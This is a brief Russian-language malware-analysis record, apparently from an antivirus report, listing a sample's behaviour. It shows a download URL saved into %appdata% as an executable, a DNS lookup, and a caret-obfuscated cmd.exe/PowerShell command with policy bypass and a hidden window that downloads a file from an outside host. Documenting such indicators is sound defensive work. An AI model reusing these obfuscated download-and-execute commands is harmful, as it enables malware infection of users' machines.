Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^weRS^H^El^L.eXE^ -E^x^Ec^ut^i^o^Np^OLiCY^ ^Bypass -noprOfIl^e ^-^windO^WStYlE H^i^dDEn (n^e^w^-O^Bj^E^C^t^ ^SyST^e^m.NET^.web^ClIE^n^t)^.^DO^w^NL^o^ADfi^l^E^('http://hometower...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /C "po^weRS^H^El^L.eXE^ -E^x^Ec^ut^i^o^Np^OLiCY^ ^Bypass -noprOfIl^e ^-^windO^WStYlE H^i^dDEn (n^e^w^-O^Bj^E^C^t^ ^SyST^e^m.NET^.web^ClIE^n^t)^.^DO^w^NL^o^ADfi^l^E^('http://hometower...' (со скрытым окном)